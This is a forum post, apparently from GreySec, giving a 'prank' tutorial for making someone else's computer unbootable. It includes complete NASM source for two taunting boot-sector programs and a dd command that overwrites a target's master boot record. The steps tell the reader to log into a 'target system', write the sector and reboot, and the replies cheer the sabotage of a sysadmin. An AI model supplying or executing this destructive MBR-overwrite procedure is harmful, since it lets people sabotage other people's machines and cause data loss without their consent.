GreySec Forums

Full Version: [ASM] NoBOOT4U Prank
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Note: This is a tutorial/boot loader written by me originally from aother forum but I brought it here, so..yeah. I also used Damn Small Linux which comes with a very unfitting background so please ignore that.
I got bored and created a little boot loader in assembly language
(You can learn the basics of it here)
And I decided why not make a little prank tutorial out of it...
The Warning: Keep in mind this "prank" can be extremely destructive of an hdd.  And might make someone just about kill you.  Also I tested this on DSL (Damn small linux) in a virtual box,  I suggest you do the same.
The Result: An un-bootable hard drive and a very upset user who now have to fix their mbr.  Every time the user boots  into that hard drive they can no longer get past anything but your taunting message.
The Prank:
Requirements...
  • A bin file designed to take up the first 512 bytes of a hard drive
  • root (big requirement, I know)
  • way to download boot.bin to the computer
Let's get started..
Step 1
Log into the target system
[Image: bgIf0cE.png]
Step 2
Download boot.bin file, I had mine on a local webserver
[Image: oanhdvn.png]
Step 3
Use dd (For windows use this) and enter the following
Code:
dd if=boot.bin of=/dev/hda bs=512 count=1
input file = boot.bin
output file = /dev/hda
bs = read up to 512 bytes
count = 1 iteration
/dev/hda is the main bootable hard drive (you'll have to figure this part out because it is most likely different on your system)
[Image: mNHafuF.png]
Step 4
Reboot!
[Image: nEY4OSG.png]
Step 5
Laugh when your sys admin cries..
[Image: IlSflb2.png]
Source Code for my boot.bin, make sure you compile with nasm
Code:
[BITS 16]
[ORG 0x7C00]
MOV SI, Msg
CALL OutStr
JMP $
OutChar:
 MOV AH, 0x0E
 MOV BH, 0x00
 MOV BL, 0x07
 INT 0x10
RET
OutStr:
 next_char:
 MOV AL, [SI]
 INC SI
 OR AL, AL
 JZ exit_function
 CALL OutChar
 JMP next_char
 exit_function:
RET
Msg db 0xA, 0xD, 0xA, 0xD
       db 'Hello from...', 0xA, 0xD, 0xA, 0xD
       db ' #     #  #####  #####   #######', 0xA, 0xD
       db ' #     #      #  #    #  # #   #', 0xA, 0xD
       db ' #######   ####  #    #  #  #  #', 0xA, 0xD
       db ' #     #      #  ####    #   # #', 0xA, 0xD
       db ' #     #  #####  #    #  #######', 0xA, 0xD
       db '                               ', 0xA, 0xD
       db '           [Good Bye]', 0
TIMES 510 - ($ - $$) db 0
DW 0xAA55
Alternate source code (With tea bagging!)
Code:
[BITS 16]
[ORG 0x7C00]
CALL Loop
JMP $
Loop:
 CALL Delay
 CALL Clear
 CALL FrameOne
 CALL Delay
 CALL Clear
 CALL FrameTwo
 CALL Loop
RET
Delay:
 mov bp, 2000
 mov si, 2000
 delay2:
   dec bp
   nop
   jnz delay2
   dec si
   cmp si,0    
   jnz delay2
RET
OutChar:
 MOV AH, 0x0E
 MOV BH, 0x00
 MOV BL, 0x07
 INT 0x10
RET
OutStr:
 next_char:
 MOV AL, [SI]
 INC SI
 OR AL, AL
 JZ exit_function
 CALL OutChar
 JMP next_char
 exit_function:
RET
Banner:
 MOV SI, Msg
 CALL OutStr
RET
FrameOne:
 CALL Banner
 MOV SI, Frame1
 CALL OutStr
RET
FrameTwo:
 CALL Banner
 MOV SI, Frame2
 CALL OutStr
RET
Clear:
 MOV AH,6
 MOV AL,50
 MOV BH,7
 MOV CH,0
 MOV CL,0
 MOV DH,24
 MOV DL,79
 INT 10H
RET
Msg db 0xA, 0xD, 0xA, 0xD
       db 'Greetings from...', 0xA, 0xD, 0xA, 0xD
       db ' ',0xB2,'     ',0xB2,'  ',0xB1,0xB2,0xDB,0xDB,0xDB,'  ',0xDB,0xB2,0xB2,0xB1,0xB1,'   ',0xB2,0xB2,0xB1,0xB2,0xDB,0xDB,0xDB, 0xA, 0xD
       db ' ',0xB2,'     ',0xB2,'      ',0xDB,'  ',0xDB,'    ',0xB1,'  ',0xB2,' ',0xB0,'   ',0xB2, 0xA, 0xD
       db ' ',0xDB,0xDB,0xDB,0xDB,0xB2,0xB1,0xB2,'   ',0xB0,0xB1,0xB2,0xDB,'  ',0xDB,'    ',0xB1,'  ',0xB2,'  ',0xB0,'  ',0xB2, 0xA, 0xD
       db ' ',0xDB,'     ',0xB2,'      ',0xDB,'  ',0xB2,0xB2,0xB1,0xB0,'    ',0xB2,'   ',0xB0,' ',0xB2, 0xA, 0xD
       db ' ',0xB2,'     ',0xB1,'  ',0xB0,0xB1,0xB2,0xDB,0xDB,'  ',0xB2,'    ',0xB0,'  ',0xB2,0xB2,0xB1,0xB2,0xDB,0xDB,0xB2, 0xA, 0xD
       db ' ',0xB1,'     ',0xB0,'                          ', 0xA, 0xD
       db ' ',0xB0,'           [Good Bye]', 0
Frame1 db 0xA, 0xD, 0xA, 0xD
      db '[ ] Rekt'
      db '  0 ', 0xA, 0xD
      db '         /@\', 0xA, 0xD
      db '         /"\', 0xA, 0xD
      db '        [you]', 0
Frame2 db 0xA, 0xD, 0xA, 0xD
      db '[x] Rekt'
      db '  o ', 0xA, 0xD
      db '         /@\', 0xA, 0xD
      db '         2"2', 0xA, 0xD
      db '        [you]', 0
TIMES 510 - ($ - $$) db 0
DW 0xAA55
Output:
[Image: Smk7njv.gif]
I hope you enjoy this and I'm not responsible for you getting beat up.
Lmao, overriding the MBR is a pretty hardcore prank, the tea bagging ASCII character is a nice touch as well.
Getting root isn't hard at all (considering you have physical access that is), yea if I was that sysadmin I'd be so pissed XD